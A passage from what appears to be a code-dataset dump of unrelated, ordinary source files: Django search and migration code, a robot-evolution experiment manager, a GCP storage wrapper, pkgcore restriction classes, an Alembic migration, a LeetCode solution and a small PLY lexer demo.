}
| 2.203125 | 2 |
apart/search.py | ruslan-ok/ServerApps | 1 | 3374 | <filename>apart/search.py
from django.db.models import Q
from hier.search import SearchResult
from .models import app_name, Apart, Meter, Bill, Service, Price
def search(user, query):
result = SearchResult(query)
lookups = Q(name__icontains=query) | Q(addr__icontains=query)
items = Apart.objects.filter(user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'apart', item.id, None, item.name, item.addr, False)
lookups = Q(info__icontains=query)
items = Meter.objects.filter(apart__user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'meter', item.id, item.reading.date(), item.name(), item.info, False, item.apart.name, item.period.strftime('%m.%Y'))
lookups = Q(info__icontains=query) | Q(url__icontains=query)
items = Bill.objects.filter(apart__user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'bill', item.id, item.payment.date(), item.name(), item.info, False, item.apart.name, item.period.strftime('%m.%Y'))
lookups = Q(name__icontains=query) | Q(abbr__icontains=query)
items = Service.objects.filter(apart__user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'service', item.id, None, item.name, item.abbr, False, item.apart.name)
lookups = Q(info__icontains=query)
items = Price.objects.filter(apart__user = user.id).filter(lookups)
for item in items:
result.add(app_name, 'price', item.id, item.start, item.name(), item.info, False, item.apart.name)
return result.items
| 2.203125 | 2 |
pyrevolve/experiment_management.py | MRebolle/Battery-Robot | 0 | 3375 | <filename>pyrevolve/experiment_management.py<gh_stars>0
import os
import shutil
import numpy as np
from pyrevolve.custom_logging.logger import logger
import sys
class ExperimentManagement:
# ids of robots in the name of all types of files are always phenotype ids, and the standard for id is 'robot_ID'
def __init__(self, settings):
self.settings = settings
manager_folder = os.path.dirname(self.settings.manager)
self._experiment_folder = os.path.join(manager_folder, 'data', self.settings.experiment_name, self.settings.run)
self._data_folder = os.path.join(self._experiment_folder, 'data_fullevolution')
self._gen_num = 0
def create_exp_folders(self):
if os.path.exists(self.experiment_folder):
shutil.rmtree(self.experiment_folder)
os.makedirs(self.experiment_folder)
os.mkdir(self.data_folder)
folders = ['genotypes', 'phenotypes', 'descriptors', 'objectives', 'fitness',
'battery', 'phenotype_images', 'failed_eval_robots']
for folder in folders:
os.mkdir(os.path.join(self.data_folder, folder))
@property
def experiment_folder(self):
return self._experiment_folder
@property
def data_folder(self):
return self._data_folder
def export_genotype(self, individual):
if self.settings.recovery_enabled:
individual.export_genotype(self.data_folder)
def export_phenotype(self, individual):
if self.settings.export_phenotype:
individual.export_phenotype(self.data_folder)
def export_fitnesses(self, individuals):
folder = self.data_folder
for individual in individuals:
individual.export_fitness(folder)
def export_fitness(self, individual):
folder = os.path.join(self.data_folder, 'fitness')
individual.export_fitness(folder)
def export_objectives(self, individual):
folder = os.path.join(self.data_folder, 'objectives')
individual.export_objectives(folder)
def export_battery(self, individual):
folder = os.path.join(self.data_folder, 'battery')
individual.export_battery(folder)
def export_behavior_measures(self, _id, measures):
filename = os.path.join(self.data_folder, 'descriptors', f'behavior_desc_{_id}.txt')
with open(filename, "w") as f:
if measures is None:
f.write(str(None))
else:
for key, val in measures.items():
f.write(f"{key} {val}\n")
def export_phenotype_images(self, dirpath, individual):
individual.phenotype.render_body(os.path.join(self.experiment_folder, dirpath, f'body_{individual.phenotype.id}.png'))
individual.phenotype.render_brain(os.path.join(self.experiment_folder, dirpath, f'brain_{individual.phenotype.id}.png'))
def export_failed_eval_robot(self, individual):
individual.genotype.export_genotype(os.path.join(self.data_folder, 'failed_eval_robots', f'genotype_{individual.phenotype.id}.txt'))
individual.phenotype.save_file(os.path.join(self.data_folder, 'failed_eval_robots', f'phenotype_{individual.phenotype.id}.yaml'))
individual.phenotype.save_file(os.path.join(self.data_folder, 'failed_eval_robots', f'phenotype_{individual.phenotype.id}.sdf'), conf_type='sdf')
def export_snapshots(self, individuals, gen_num):
self._gen_num = gen_num
if self.settings.recovery_enabled:
path = os.path.join(self.experiment_folder, f'selectedpop_{gen_num}')
if os.path.exists(path):
shutil.rmtree(path)
os.mkdir(path)
for ind in individuals:
self.export_phenotype_images(f'selectedpop_{str(gen_num)}', ind)
logger.info(f'Exported snapshot {str(gen_num)} with {str(len(individuals))} individuals')
def experiment_is_new(self):
if not os.path.exists(self.experiment_folder):
return True
path, dirs, files = next(os.walk(os.path.join(self.data_folder, 'fitness')))
if len(files) == 0:
return True
else:
return False
def read_recovery_state(self, population_size, offspring_size):
snapshots = []
for r, d, f in os.walk(self.experiment_folder):
for dir in d:
if 'selectedpop' in dir:
exported_files = len([name for name in os.listdir(os.path.join(self.experiment_folder, dir)) if os.path.isfile(os.path.join(self.experiment_folder, dir, name))])
if exported_files == (population_size * 2): # body and brain files
snapshots.append(int(dir.split('_')[1]))
if len(snapshots) > 0:
# the latest complete snapshot
last_snapshot = np.sort(snapshots)[-1]
# number of robots expected until the snapshot
n_robots = population_size + last_snapshot * offspring_size
else:
last_snapshot = -1
n_robots = 0
robot_ids = []
for r, d, f in os.walk(os.path.join(self.data_folder, 'fitness')):
for file in f:
robot_ids.append(int(file.split('.')[0].split('_')[-1]))
last_id = np.sort(robot_ids)[-1]
# if there are more robots to recover than the number expected in this snapshot
if last_id > n_robots:
# then recover also this partial offspring
has_offspring = True
else:
has_offspring = False
return last_snapshot, has_offspring, last_id+1
def plot_path(self, data_source: str, filename: str, file_extension=".png"):
data_folder = os.path.join(self._data_folder, data_source)
if not os.path.exists(data_folder):
os.mkdir(data_folder)
return os.path.join(data_folder, filename + str(self._gen_num) + file_extension)
| 2.359375 | 2 |
books/model/Instrumentation.py | nudglabs/books-python-wrappers | 9 | 3376 | #$Id$
class Instrumentation:
"""This class is used tocreate object for instrumentation."""
def __init__(self):
"""Initialize parameters for Instrumentation object."""
self.query_execution_time = ''
self.request_handling_time = ''
self.response_write_time = ''
self.page_context_write_time = ''
def set_query_execution_time(self, query_execution_time):
"""Set query execution time.
Args:
query_execution_time(str): Query execution time.
"""
self.query_execution_time = query_execution_time
def get_query_execution_time(self):
"""Get query execution time.
Returns:
str: Query execution time.
"""
return self.query_execution_time
def set_request_handling_time(self, request_handling_time):
"""Set request handling time.
Args:
request_handling_time(str): Request handling time.
"""
self.request_handling_time = request_handling_time
def get_request_handling_time(self):
"""Get request handling time.
Returns:
str: Request handling time.
"""
return self.request_handling_time
def set_response_write_time(self, response_write_time):
"""Set response write time.
Args:
response_write_time(str): Response write time.
"""
self.response_write_time = response_write_time
def get_response_write_time(self):
"""Get response write time.
Returns:
str: Response write time.
"""
return self.response_write_time
def set_page_context_write_time(self, page_context_write_time):
"""Set page context write time.
Args:
page_context_write_time(str): Page context write time.
"""
self.page_context_write_time = page_context_write_time
def get_page_context_write_time(self):
"""Get page context write time.
Returns:
str: Page context write time.
"""
return self.page_context_write_time
| 2.578125 | 3 |
DPR/setup.py | sophiaalthammer/parm | 18 | 3377 | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from setuptools import setup
with open("README.md") as f:
readme = f.read()
setup(
name="dpr",
version="0.1.0",
description="Facebook AI Research Open Domain Q&A Toolkit",
url="https://github.com/facebookresearch/DPR/",
classifiers=[
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.6",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
long_description=readme,
long_description_content_type="text/markdown",
setup_requires=[
"setuptools>=18.0",
],
install_requires=[
"cython",
"faiss-cpu>=1.6.1",
"filelock",
"numpy",
"regex",
"torch>=1.2.0",
"transformers>=3.0.0,<3.1.0",
"tqdm>=4.27",
"wget",
"spacy>=2.1.8",
],
)
| 1.132813 | 1 |
leetcode/hard/smallest_range/srcs/a_with_ordered_dict.py | BillionsRichard/pycharmWorkspace | 0 | 3378 | # encoding: utf-8
"""
@version: v1.0
@author: Richard
@license: Apache Licence
@contact: <EMAIL>
@site:
@software: PyCharm
@time: 2019/9/12 20:37
"""
from pprint import pprint as pp
from operator import itemgetter
import time
from collections import OrderedDict
from hard.smallest_range.srcs.big_2d_list import BIG_LIST_85
from hard.smallest_range.srcs.big_2d_list import BIG_LIST_86
class Solution:
"""
    Input: [[4,10,15,24,26], [0,9,12,20], [5,18,22,30]]
    Output: [20,24]
"""
def smallestRange(self, nums):
start_time = time.time()
k = len(nums)
print('k-->', k)
k_tagged_merged_list = []
for i in range(k):
row = nums[i]
k_tagged_merged_list.extend([(e, i) for e in row])
k_tagged_merged_list.sort(key=itemgetter(0))
sort_end_time = time.time()
print('sorting time:', sort_end_time - start_time)
# print(k_tagged_merged_list)
od = OrderedDict()
min_range = None
min_range_len = int(2e5)
# print('min_range_len', min_range_len)
tot_len = len(k_tagged_merged_list)
# print('tot_len', tot_len)
i = 0
while i < tot_len:
this_tag = k_tagged_merged_list[i][1]
cur_tag_set = od.keys()
if this_tag in cur_tag_set:
od.pop(this_tag)
od[this_tag] = k_tagged_merged_list[i][0]
tags = od.keys()
# print('len_k_dque-->', len(k_dque))
# print('len_k_dque_tags-->', len(k_dque_tags))
if len(tags) == k:
keys = list(od.keys())
first_v = od[keys[0]]
last_v = od[keys[-1]]
k_range_len = last_v - first_v
if k_range_len < min_range_len:
min_range_len = k_range_len
min_range = first_v, last_v
i += 1
print('ending main time:', time.time() - sort_end_time)
return min_range
if __name__ == '__main__':
s = Solution()
nums = [[4, 10, 15, 24, 26], [0, 9, 12, 20], [5, 18, 22, 30]]
# nums = [[10], [11]]
# nums = [[11,38,83,
# 84,84,85,88,89,89,92],[28,61,89],[52,77,79,80,81],[21,25,26,26,26,27],[9,83,85,90],[84,85,87],[26,68,70,71],[36,40,41,42,45],[-34,21],[-28,-28,-23,1,13,21,28,37,37,38],[-74,1,2,22,33,35,43,45],[54,96,98,98,99],[43,54,60,65,71,75],[43,46],[50,50,58,67,69],[7,14,15],[78,80,89,89,90],[35,47,63,69,77,92,94]]
# [-74, 1, 2, 22, 33, 35, 43, 45], [54, 96, 98, 98, 99], [43, 54, 60, 65, 71, 75], [43, 46],
# [50, 50, 58, 67, 69], [7, 14, 15], [78, 80, 89, 89, 90], [35, 47, 63, 69, 77, 92, 94]]
nums = BIG_LIST_85
# nums = BIG_LIST_86
min_range = s.smallestRange(nums)
print(min_range)
| 3.203125 | 3 |
pcf/particle/gcp/storage/storage.py | davidyum/Particle-Cloud-Framework | 0 | 3379 | <reponame>davidyum/Particle-Cloud-Framework<filename>pcf/particle/gcp/storage/storage.py
from pcf.core.gcp_resource import GCPResource
from pcf.core import State
import logging
from google.cloud import storage
from google.cloud import exceptions
logger = logging.getLogger(__name__)
class Storage(GCPResource):
"""
This is the implementation of Google's storage service.
"""
flavor = "storage"
equivalent_states = {
State.running: 1,
State.stopped: 0,
State.terminated: 0
}
UNIQUE_KEYS = ["gcp_resource.name"]
def __init__(self, particle_definition):
super(Storage, self).__init__(particle_definition=particle_definition, resource=storage)
self.bucket_name = self.desired_state_definition["name"]
self._set_unique_keys()
def _set_unique_keys(self):
"""
Logic that sets keys from state definition that are used to uniquely identify the storage bucket
"""
self.unique_keys = Storage.UNIQUE_KEYS
def get_status(self):
"""
Determines if the bucket exists
Returns:
status (dict)
"""
try:
bucket = self.client.get_bucket(self.bucket_name)
return bucket
except exceptions.NotFound:
return {"status": "missing"}
def _terminate(self):
"""
Deletes the storage bucket
Returns:
response of gcp delete
"""
return self.client.bucket(bucket_name=self.bucket_name).delete()
def _start(self):
"""
Creates the storage bucket
Returns:
response of create_bucket
"""
# create_definition = pcf_util.keep_and_replace_keys(self.get_desired_state_definition(),
# S3Bucket.START_PARAMS)
return self.client.bucket(bucket_name=self.bucket_name).create()
def _stop(self):
"""
        The storage bucket does not have a stopped state, so this calls terminate.
"""
return self.terminate()
def sync_state(self):
"""
Calls get status and then sets the current state.
"""
full_status = self.get_status()
if full_status:
if isinstance(full_status, self.resource.Bucket):
self.state = State.running
else:
self.state = State.terminated
self.current_state_definition = self.desired_state_definition
def download_object(self, blob_name, file_obj, **kwargs):
"""
        Downloads an object from the storage bucket.
        Args:
            blob_name (str): Object name (Required)
            file_obj (file): file object to download into (Required)
            **kwargs: Options passed to the blob download (optional)
        """
        bucket = self.client.get_bucket(self.bucket_name)
        return self.resource.Blob(blob_name, bucket).download_to_file(file_obj, **kwargs)
def delete_object(self, blob_name):
"""
Deletes an object in the storage bucket.
Args:
blob_name (str): Object Key name (Required)
"""
bucket = self.client.get_bucket(self.bucket_name)
return bucket.delete_blob(blob_name)
def list_objects(self, **kwargs):
"""
Lists all objects in the storage bucket.
Args:
            **kwargs: Options passed to list_blobs (optional)
"""
bucket = self.client.get_bucket(self.bucket_name)
return list(bucket.list_blobs(**kwargs))
def put_object(self, blob_name, file_obj, **kwargs):
"""
        Puts an object into the storage bucket.
        Args:
            blob_name (str): Object Key name (Required)
            file_obj (object): the object to put into the bucket (Required)
            **kwargs: Options passed to upload_from_file (optional)
"""
bucket = self.client.get_bucket(self.bucket_name)
return self.resource.Blob(blob_name, bucket).upload_from_file(file_obj, **kwargs)
def put_file(self, blob_name, file, **kwargs):
"""
        Puts a file into the storage bucket.
        Args:
            blob_name (str): Object Key name (Required)
            file (file): the file to put into the bucket (Required)
            **kwargs: Options passed to upload_from_filename (optional)
"""
bucket = self.client.get_bucket(self.bucket_name)
return self.resource.Blob(blob_name, bucket).upload_from_filename(file, **kwargs)
def _update(self):
"""
Not Implemented
"""
pass
def is_state_equivalent(self, state1, state2):
"""
        Determines if states are equivalent. Uses equivalent_states defined in the Storage class.
        Args:
            state1 (State):
            state2 (State):
Returns:
bool
"""
return Storage.equivalent_states.get(state1) == Storage.equivalent_states.get(state2)
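# Illustrative usage sketch (not part of the original module). The exact
# particle_definition schema comes from the PCF base classes; the fields shown
# here are assumptions, and only the gcp_resource "name" key is used above.
if __name__ == "__main__":
    example_definition = {
        "pcf_name": "example_storage",            # assumed field
        "flavor": "storage",
        "gcp_resource": {"name": "example-bucket-name"},
    }
    particle = Storage(example_definition)        # needs GCP credentials at runtime
    particle.sync_state()
    print(particle.state)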
| 2.578125 | 3 |
cimcb/utils/smooth.py | CIMCB/cimcb | 5 | 3380 | import numpy as np
def smooth(a, WSZ):
# a: NumPy 1-D array containing the data to be smoothed
    # WSZ: smoothing window size, which must be an odd number,
# as in the original MATLAB implementation
if WSZ % 2 == 0:
WSZ = WSZ - 1
out0 = np.convolve(a, np.ones(WSZ, dtype=int), 'valid') / WSZ
r = np.arange(1, WSZ - 1, 2)
start = np.cumsum(a[:WSZ - 1])[::2] / r
stop = (np.cumsum(a[:-WSZ:-1])[::2] / r)[::-1]
return np.concatenate((start, out0, stop))
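# Illustrative usage (not part of the original module): the output has the
# same length as the input; even window sizes are reduced by one above.
if __name__ == "__main__":
    noisy = np.sin(np.linspace(0, 2 * np.pi, 50)) + 0.1 * np.random.randn(50)
    smoothed = smooth(noisy, 5)
    print(noisy.shape, smoothed.shape)  # (50,) (50,)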
| 2.984375 | 3 |
ezeeai/core/extensions/best_exporter.py | jmarine/ezeeai | 19 | 3381 | from __future__ import absolute_import
import abc
import os
import json
import glob
import shutil
from tensorflow.python.estimator import gc
from tensorflow.python.estimator import util
from tensorflow.python.estimator.canned import metric_keys
from tensorflow.python.framework import errors_impl
from tensorflow.python.platform import gfile
from tensorflow.python.platform import tf_logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.estimator.exporter import Exporter, _SavedModelExporter
def _verify_compare_fn_args(compare_fn):
"""Verifies compare_fn arguments."""
args = set(util.fn_args(compare_fn))
if 'best_eval_result' not in args:
raise ValueError(
'compare_fn (%s) must include best_eval_result argument.' % compare_fn)
if 'current_eval_result' not in args:
raise ValueError(
'compare_fn (%s) must include current_eval_result argument.' %
compare_fn)
non_valid_args = list(args - set(['best_eval_result', 'current_eval_result']))
if non_valid_args:
raise ValueError('compare_fn (%s) has following not expected args: %s' %
(compare_fn, non_valid_args))
def _loss_smaller(best_eval_result, current_eval_result):
"""Compares two evaluation results and returns true if the 2nd one is smaller.
Both evaluation results should have the values for MetricKeys.LOSS, which are
used for comparison.
Args:
best_eval_result: best eval metrics.
current_eval_result: current eval metrics.
Returns:
True if the loss of current_eval_result is smaller; otherwise, False.
Raises:
ValueError: If input eval result is None or no loss is available.
"""
default_key = metric_keys.MetricKeys.LOSS
if not best_eval_result or default_key not in best_eval_result:
raise ValueError(
'best_eval_result cannot be empty or no loss is found in it.')
if not current_eval_result or default_key not in current_eval_result:
raise ValueError(
'current_eval_result cannot be empty or no loss is found in it.')
return best_eval_result[default_key] > current_eval_result[default_key]
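# Illustrative sketch (not part of the original module): a custom compare_fn
# that prefers higher accuracy instead of lower loss. The function name and
# the "accuracy" metric key are assumptions about what the estimator reports;
# the signature satisfies _verify_compare_fn_args and can be passed as
# compare_fn to BestExporter below.
def _accuracy_higher(best_eval_result, current_eval_result):
    """Returns True if current_eval_result has a higher accuracy."""
    key = 'accuracy'
    if not best_eval_result or key not in best_eval_result:
        raise ValueError('best_eval_result cannot be empty or has no accuracy.')
    if not current_eval_result or key not in current_eval_result:
        raise ValueError('current_eval_result cannot be empty or has no accuracy.')
    return current_eval_result[key] > best_eval_result[key]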
class BestExporter(Exporter):
"""This class exports the serving graph and checkpoints of the best models.
    This class performs a model export every time the new model is better
    than any existing model.
"""
def __init__(self,
name='best_exporter',
serving_input_receiver_fn=None,
event_file_pattern='eval/*.tfevents.*',
compare_fn=_loss_smaller,
assets_extra=None,
as_text=False,
exports_to_keep=5):
"""Create an `Exporter` to use with `tf.estimator.EvalSpec`.
        Example of creating a BestExporter for training and evaluation:
```python
def make_train_and_eval_fn():
# Set up feature columns.
categorial_feature_a = (
tf.feature_column.categorical_column_with_hash_bucket(...))
categorial_feature_a_emb = embedding_column(
categorical_column=categorial_feature_a, ...)
... # other feature columns
estimator = tf.estimator.DNNClassifier(
config=tf.estimator.RunConfig(
model_dir='/my_model', save_summary_steps=100),
feature_columns=[categorial_feature_a_emb, ...],
hidden_units=[1024, 512, 256])
serving_feature_spec = tf.feature_column.make_parse_example_spec(
categorial_feature_a_emb)
serving_input_receiver_fn = (
tf.estimator.export.build_parsing_serving_input_receiver_fn(
serving_feature_spec))
exporter = tf.estimator.BestExporter(
name="best_exporter",
serving_input_receiver_fn=serving_input_receiver_fn,
exports_to_keep=5)
train_spec = tf.estimator.TrainSpec(...)
eval_spec = [tf.estimator.EvalSpec(
input_fn=eval_input_fn,
steps=100,
exporters=exporter,
start_delay_secs=0,
throttle_secs=5)]
return tf.estimator.DistributedTrainingSpec(estimator, train_spec,
eval_spec)
```
Args:
name: unique name of this `Exporter` that is going to be used in the
export path.
serving_input_receiver_fn: a function that takes no arguments and returns
a `ServingInputReceiver`.
event_file_pattern: event file name pattern relative to model_dir. If
        None, however, the exporter would not be preemption-safe. To be
preemption-safe, event_file_pattern should be specified.
compare_fn: a function that compares two evaluation results and returns
true if current evaluation result is better. Follows the signature:
* Args:
* `best_eval_result`: This is the evaluation result of the best model.
* `current_eval_result`: This is the evaluation result of current
candidate model.
* Returns:
True if current evaluation result is better; otherwise, False.
assets_extra: An optional dict specifying how to populate the assets.extra
directory within the exported SavedModel. Each key should give the
destination path (including the filename) relative to the assets.extra
directory. The corresponding value gives the full path of the source
file to be copied. For example, the simple case of copying a single
file without renaming it is specified as `{'my_asset_file.txt':
'/path/to/my_asset_file.txt'}`.
as_text: whether to write the SavedModel proto in text format. Defaults to
`False`.
exports_to_keep: Number of exports to keep. Older exports will be
garbage-collected. Defaults to 5. Set to `None` to disable garbage
collection.
Raises:
ValueError: if any arguments is invalid.
"""
self._compare_fn = compare_fn
if self._compare_fn is None:
raise ValueError('`compare_fn` must not be None.')
_verify_compare_fn_args(self._compare_fn)
self._saved_model_exporter = _SavedModelExporter(
name, serving_input_receiver_fn, assets_extra, as_text)
self._event_file_pattern = event_file_pattern
self._model_dir = None
self._best_eval_result = None
self._exports_to_keep = exports_to_keep
self._log = {}
if exports_to_keep is not None and exports_to_keep <= 0:
raise ValueError(
'`exports_to_keep`, if provided, must be positive number')
@property
def name(self):
return self._saved_model_exporter.name
def export(self, estimator, export_path, checkpoint_path, eval_result,
is_the_final_export):
export_result = None
if self._model_dir != estimator.model_dir and self._event_file_pattern:
# Loads best metric from event files.
tf_logging.info('Loading best metric from event files.')
self._model_dir = estimator.model_dir
full_event_file_pattern = os.path.join(self._model_dir,
self._event_file_pattern)
self._best_eval_result = self._get_best_eval_result(
full_event_file_pattern)
if os.path.isfile(os.path.join(export_path, 'export.log')):
self._log = {}
try:
self._log = json.load(open(os.path.join(export_path, 'export.log'), 'r'))
except json.JSONDecodeError:
pass
if len(self._log) == 0:
self._best_eval_result = None
if self._best_eval_result is None or self._compare_fn(
best_eval_result=self._best_eval_result,
current_eval_result=eval_result):
tf_logging.info('Performing best model export.')
self._best_eval_result = eval_result
export_result = self._saved_model_exporter.export(
estimator, export_path, checkpoint_path, eval_result,
is_the_final_export)
export_result_path = export_result.decode("utf-8")
self._log[export_result_path] = {k: float(v) for k, v in eval_result.items()}
self._copy_checkpoint(checkpoint_path, export_result_path, eval_result["global_step"])
self._garbage_collect_exports(export_path)
with open(os.path.join(export_path, 'export.log'), 'w') as fp:
json.dump(self._log, fp)
return export_result
def _copy_checkpoint(self, checkpoint_pattern, dest_path, step):
for file in glob.glob(checkpoint_pattern + '*'):
shutil.copy(file, dest_path)
with open(os.path.join(dest_path, 'checkpoint'), 'w') as fp:
text = 'model_checkpoint_path: "model.ckpt-number"\n'.replace('number', str(step))
fp.write(text)
fp.close()
def _garbage_collect_exports(self, export_dir_base):
"""Deletes older exports, retaining only a given number of the most recent.
Export subdirectories are assumed to be named with monotonically increasing
integers; the most recent are taken to be those with the largest values.
Args:
export_dir_base: the base directory under which each export is in a
versioned subdirectory.
"""
if self._exports_to_keep is None:
return
def _export_version_parser(path):
# create a simple parser that pulls the export_version from the directory.
filename = os.path.basename(path.path)
if not (len(filename) == 10 and filename.isdigit()):
return None
return path._replace(export_version=int(filename))
# pylint: disable=protected-access
keep_filter = gc._largest_export_versions(self._exports_to_keep)
delete_filter = gc._negation(keep_filter)
for p in delete_filter(
gc._get_paths(export_dir_base, parser=_export_version_parser)):
try:
del self._log[p.path]
gfile.DeleteRecursively(p.path)
except errors_impl.NotFoundError as e:
tf_logging.warn('Can not delete %s recursively: %s', p.path, e)
# pylint: enable=protected-access
def _get_best_eval_result(self, event_files):
"""Get the best eval result from event files.
Args:
event_files: Absolute pattern of event files.
Returns:
The best eval result.
"""
if not event_files:
return None
event_count = 0
best_eval_result = None
for event_file in gfile.Glob(os.path.join(event_files)):
for event in summary_iterator.summary_iterator(event_file):
if event.HasField('summary'):
event_eval_result = {}
for value in event.summary.value:
if value.HasField('simple_value'):
event_eval_result[value.tag] = value.simple_value
if event_eval_result:
if best_eval_result is None or self._compare_fn(
best_eval_result, event_eval_result):
event_count += 1
best_eval_result = event_eval_result
if event_count < 2:
return None
return best_eval_result
| 2.0625 | 2 |
src/pkgcore/restrictions/restriction.py | mgorny/pkgcore | 0 | 3382 | <reponame>mgorny/pkgcore<filename>src/pkgcore/restrictions/restriction.py<gh_stars>0
# Copyright: 2005-2012 <NAME> <<EMAIL>
# Copyright: 2006 <NAME> <<EMAIL>>
# License: BSD/GPL2
"""
base restriction class
"""
from functools import partial
from snakeoil import caching, klass
from snakeoil.currying import pretty_docs
class base(object, metaclass=caching.WeakInstMeta):
"""base restriction matching object.
all derivatives *should* be __slot__ based (lot of instances may
wind up in memory).
"""
__inst_caching__ = True
# __weakref__ here is implicit via the metaclass
__slots__ = ()
package_matching = False
klass.inject_immutable_instance(locals())
def match(self, *arg, **kwargs):
raise NotImplementedError
def force_False(self, *arg, **kwargs):
return not self.match(*arg, **kwargs)
def force_True(self, *arg, **kwargs):
return self.match(*arg, **kwargs)
def __len__(self):
return 1
class AlwaysBool(base):
"""restriction that always yields a specific boolean"""
__slots__ = ("type", "negate")
__inst_caching__ = True
def __init__(self, node_type=None, negate=False):
"""
:param node_type: the restriction type the instance should be,
typically :obj:`pkgcore.restrictions.packages.package_type` or
:obj:`pkgcore.restrictions.values.value_type`
:param negate: boolean to return for the match
"""
object.__setattr__(self, "negate", negate)
object.__setattr__(self, "type", node_type)
def match(self, *a, **kw):
return self.negate
def force_True(self, *a, **kw):
return self.negate
def force_False(self, *a, **kw):
return not self.negate
def __iter__(self):
return iter(())
def __str__(self):
return f"always '{self.negate}'"
def __repr__(self):
return '<%s always %r @%#8x>' % (
self.__class__.__name__, self.negate, id(self))
def __getstate__(self):
return self.negate, self.type
def __setstate__(self, state):
negate, node_type = state
object.__setattr__(self, "negate", negate)
object.__setattr__(self, "type", node_type)
class Negate(base):
"""wrap and negate a restriction instance"""
__slots__ = ("type", "_restrict")
__inst_caching__ = False
def __init__(self, restrict):
"""
:param restrict: :obj:`pkgcore.restrictions.restriction.base` instance
to negate
"""
sf = object.__setattr__
sf(self, "type", restrict.type)
sf(self, "_restrict", restrict)
def match(self, *a, **kw):
return not self._restrict.match(*a, **kw)
def __str__(self):
return "not (%s)" % self._restrict
class FakeType(base):
"""wrapper to wrap and fake a node_type"""
__slots__ = ("type", "_restrict")
__inst_caching__ = False
def __init__(self, restrict, new_type):
"""
:param restrict: :obj:`pkgcore.restrictions.restriction.base` instance
to wrap
:param new_type: new node_type
"""
sf = object.__setattr__
sf(self, "type", new_type)
sf(self, "_restrict", restrict)
def match(self, *a, **kw):
return self._restrict.match(*a, **kw)
def __str__(self):
return "Faked type(%s): %s" % (self.type, self._restrict)
class AnyMatch(base):
"""Apply a nested restriction to every item in a sequence."""
__slots__ = ('restriction', 'type', 'negate')
def __init__(self, childrestriction, node_type, negate=False):
"""Initialize.
:type childrestriction: restriction
:param childrestriction: child restriction applied to every value.
:type node_type: string
:param node_type: type of this restriction.
"""
sf = object.__setattr__
sf(self, "negate", negate)
sf(self, "restriction", childrestriction)
sf(self, "type", node_type)
def match(self, val):
for x in val:
if self.restriction.match(x):
return not self.negate
return self.negate
def __str__(self):
return "any: %s match" % (self.restriction,)
def __repr__(self):
return '<%s restriction=%r @%#8x>' % (
self.__class__.__name__, self.restriction, id(self))
def curry_node_type(cls, node_type, extradoc=None):
"""Helper function for creating restrictions of a certain type.
This uses :obj:`partial` to pass a node_type to the wrapped class,
and extends the docstring.
:param cls: callable (usually a class) that is wrapped.
:param node_type: value passed as node_type.
:param extradoc: addition to the docstring. Defaults to
"Automatically set to %s type." % node_type
:return: a wrapped callable.
"""
if extradoc is None:
extradoc = "Automatically set to %s type." % (node_type,)
doc = cls.__doc__
result = partial(cls, node_type=node_type)
if doc is None:
doc = ''
else:
# do this so indentation on pydoc __doc__ is sane
doc = "\n".join(line.lstrip() for line in doc.split("\n")) + "\n"
doc += extradoc
return pretty_docs(result, doc)
value_type = "values"
package_type = "package"
valid_types = (value_type, package_type)
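# Illustrative usage sketch (not part of the original module): currying
# AlwaysBool to the package node type and wrapping it in AnyMatch.
if __name__ == "__main__":
    PackageAlwaysBool = curry_node_type(AlwaysBool, package_type)
    # AlwaysBool.match() returns the negate flag, so negate=True always matches.
    always_true = PackageAlwaysBool(negate=True)
    print(always_true.match(object()))        # True
    any_match = AnyMatch(always_true, package_type)
    print(any_match.match([1, 2, 3]))         # True: the child matches the first item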
| 2.328125 | 2 |
keylime/migrations/versions/8da20383f6e1_extend_ip_field.py | kkaarreell/keylime | 18 | 3383 | """extend_ip_field
Revision ID: 8da20383f6e1
Revises: <KEY>
Create Date: 2021-01-14 10:50:56.275257
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "8da20383f6e1"
down_revision = "<KEY>"
branch_labels = None
depends_on = None
def upgrade(engine_name):
globals()[f"upgrade_{engine_name}"]()
def downgrade(engine_name):
globals()[f"downgrade_{engine_name}"]()
def upgrade_registrar():
pass
def downgrade_registrar():
pass
def upgrade_cloud_verifier():
with op.batch_alter_table("verifiermain") as batch_op:
batch_op.alter_column(
"ip", existing_type=sa.String(length=15), type_=sa.String(length=255), existing_nullable=True
)
def downgrade_cloud_verifier():
pass
| 1.445313 | 1 |
token_train/quickdemo(1)(1).py | Tatsuya26/processamento_de_linguagens | 0 | 3384 | <filename>token_train/quickdemo(1)(1).py
import ply.lex as lex
tokens =["NUM","OPERADORES"]
t_NUM = r'\d+'
t_OPERADORES = r'[+*-]'  # match '+', '*' or '-'; the original '[+|*|-]' also matched '|' literally
t_ignore='\n\t '
def t_error(t):
    print("Error")
    print(t)
    t.lexer.skip(1)  # skip the offending character so lexing can continue
lexer = lex.lex()
# 1+2 1-2 1*2
# ola mundo
import sys
for line in sys.stdin:
lexer.input(line)
for tok in lexer:
print(tok) | 3.046875 | 3 |
ucsrb/migrations/0013_auto_20180710_2040.py | Ecotrust/ucsrb | 1 | 3385 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-07-10 20:40
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ucsrb', '0012_auto_20180710_1249'),
]
operations = [
migrations.AddField(
model_name='treatmentscenario',
name='landform_type',
field=models.BooleanField(default=False),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes',
field=models.TextField(blank=True, default=None, null=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_east_west',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_floor',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_north',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_ridgetop',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='treatmentscenario',
name='landform_type_checkboxes_include_south',
